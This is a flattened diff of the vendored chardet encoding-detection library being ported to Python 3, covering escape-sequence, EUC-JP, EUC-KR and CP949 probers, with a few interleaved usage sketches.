self._mCurrentCharLen = self._mModel['charLenTable'][byteCls]
# from byte's class and stateTable, we get its next state
self._mCurrentState = self._mModel['stateTable'][self._mCurrentState * self._mModel['classFactor'] + byteCls]
curr_state = (self._mCurrentState * self._mModel['classFactor']
+ byteCls)
self._mCurrentState = self._mModel['stateTable'][curr_state]
self._mCurrentBytePos += 1
return self._mCurrentState
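# A minimal sketch of driving the state machine byte by byte, assuming the
# vendored package layout and the UTF8SMModel defined in mbcssm.py (import
# paths may differ):
from thirdparty.chardet.codingstatemachine import CodingStateMachine
from thirdparty.chardet.mbcssm import UTF8SMModel
from thirdparty.chardet.constants import eError

sm = CodingStateMachine(UTF8SMModel)
for byte in bytearray(b'\xe4\xbd\xa0'):    # one multi-byte UTF-8 character
    if sm.next_state(byte) == eError:
        break                              # buffer is not valid for this model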
34
thirdparty/chardet/compat.py vendored Normal file
View File
@ -0,0 +1,34 @@
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
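# A short sketch of the intended call sites, assuming stock CPython only:
# iterating a byte string on Python 2 yields 1-char str objects (ord() is
# applied), while iterating bytes on Python 3 yields plain ints (returned
# unchanged), so callers can treat both cases uniformly.
for c in b'\xc4\xa1':
    code = wrap_ord(c)    # 0xC4, then 0xA1, on both Python 2 and 3
    assert 0x00 <= code <= 0xFF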
View File
@ -37,11 +37,3 @@ eError = 1
eItsMe = 2
SHORTCUT_THRESHOLD = 0.95
import __builtin__
if not hasattr(__builtin__, 'False'):
False = 0
True = 1
else:
False = __builtin__.False
True = __builtin__.True
44
thirdparty/chardet/cp949prober.py vendored Normal file
View File
@ -0,0 +1,44 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCKRDistributionAnalysis
from .mbcssm import CP949SMModel
class CP949Prober(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(CP949SMModel)
# NOTE: CP949 is a superset of EUC-KR, so the distribution should be
# no different.
self._mDistributionAnalyzer = EUCKRDistributionAnalysis()
self.reset()
def get_charset_name(self):
return "CP949"
View File
@ -13,39 +13,43 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from escsm import HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, ISO2022KRSMModel
from charsetprober import CharSetProber
from codingstatemachine import CodingStateMachine
from . import constants
from .escsm import (HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel,
ISO2022KRSMModel)
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .compat import wrap_ord
class EscCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = [ \
self._mCodingSM = [
CodingStateMachine(HZSMModel),
CodingStateMachine(ISO2022CNSMModel),
CodingStateMachine(ISO2022JPSMModel),
CodingStateMachine(ISO2022KRSMModel)
]
]
self.reset()
def reset(self):
CharSetProber.reset(self)
for codingSM in self._mCodingSM:
if not codingSM: continue
codingSM.active = constants.True
if not codingSM:
continue
codingSM.active = True
codingSM.reset()
self._mActiveSM = len(self._mCodingSM)
self._mDetectedCharset = None
@ -61,19 +65,22 @@ class EscCharSetProber(CharSetProber):
def feed(self, aBuf):
for c in aBuf:
# PY3K: aBuf is a byte array, so c is an int, not a byte
for codingSM in self._mCodingSM:
if not codingSM: continue
if not codingSM.active: continue
codingState = codingSM.next_state(c)
if not codingSM:
continue
if not codingSM.active:
continue
codingState = codingSM.next_state(wrap_ord(c))
if codingState == constants.eError:
codingSM.active = constants.False
codingSM.active = False
self._mActiveSM -= 1
if self._mActiveSM <= 0:
self._mState = constants.eNotMe
return self.get_state()
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
self._mDetectedCharset = codingSM.get_coding_state_machine()
self._mDetectedCharset = codingSM.get_coding_state_machine() # nopep8
return self.get_state()
return self.get_state()
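# A minimal sketch of exercising this prober, assuming the vendored package
# layout (import paths may differ); a complete ISO-2022-JP escape sequence
# such as ESC $ B is normally enough to drive one of the machines to eItsMe:
from thirdparty.chardet.escprober import EscCharSetProber
from thirdparty.chardet import constants

prober = EscCharSetProber()
state = prober.feed(b'\x1b$B')              # ESC $ B switches to JIS X 0208
if state == constants.eFoundIt:
    print(prober.get_charset_name())        # "ISO-2022-JP"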
View File
@ -13,62 +13,62 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from constants import eStart, eError, eItsMe
from .constants import eStart, eError, eItsMe
HZ_cls = ( \
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
HZ_cls = (
1,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
HZ_st = ( \
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
@ -79,50 +79,50 @@ HZSMModel = {'classTable': HZ_cls,
'charLenTable': HZCharLenTable,
'name': "HZ-GB-2312"}
ISO2022CN_cls = ( \
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = ( \
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
@ -133,51 +133,51 @@ ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
'charLenTable': ISO2022CNCharLenTable,
'name': "ISO-2022-CN"}
ISO2022JP_cls = ( \
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = ( \
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
@ -188,47 +188,47 @@ ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
'charLenTable': ISO2022JPCharLenTable,
'name': "ISO-2022-JP"}
ISO2022KR_cls = ( \
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = ( \
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
@ -238,3 +238,5 @@ ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
'stateTable': ISO2022KR_st,
'charLenTable': ISO2022KRCharLenTable,
'name': "ISO-2022-KR"}
# flake8: noqa
View File
@ -13,25 +13,26 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from constants import eStart, eError, eItsMe
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import EUCJPDistributionAnalysis
from jpcntx import EUCJPContextAnalysis
from mbcssm import EUCJPSMModel
import sys
from . import constants
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJPSMModel
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
@ -51,30 +52,34 @@ class EUCJPProber(MultiByteCharSetProber):
def feed(self, aBuf):
aLen = len(aBuf)
for i in xrange(0, aLen):
# PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == eError:
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n')
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar, charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i-1:i+1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen)
self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if self._mContextAnalyzer.got_enough_data() and \
(self.get_confidence() > constants.SHORTCUT_THRESHOLD):
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
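# A minimal sketch of running the prober over a file in chunks, assuming the
# vendored package layout (import paths may differ); "sample_eucjp.txt" is a
# hypothetical input file used only for illustration:
from thirdparty.chardet.eucjpprober import EUCJPProber
from thirdparty.chardet import constants

prober = EUCJPProber()
with open('sample_eucjp.txt', 'rb') as fp:
    for chunk in iter(lambda: fp.read(4096), b''):
        if prober.feed(chunk) == constants.eFoundIt:
            break    # detection concluded early (eItsMe or the shortcut above)
print("%s %.2f" % (prober.get_charset_name(), prober.get_confidence()))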
View File
@ -592,3 +592,5 @@ EUCKRCharToFreqOrder = ( \
8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,
8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,
8736,8737,8738,8739,8740,8741)
# flake8: noqa
View File
@ -13,22 +13,23 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import EUCKRDistributionAnalysis
from mbcssm import EUCKRSMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCKRDistributionAnalysis
from .mbcssm import EUCKRSMModel
class EUCKRProber(MultiByteCharSetProber):
def __init__(self):
View File
@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -26,8 +26,8 @@
